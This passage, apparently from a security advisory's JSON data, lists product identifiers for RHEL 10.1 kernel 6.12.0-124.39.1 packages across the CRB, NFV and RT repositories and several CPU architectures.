"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
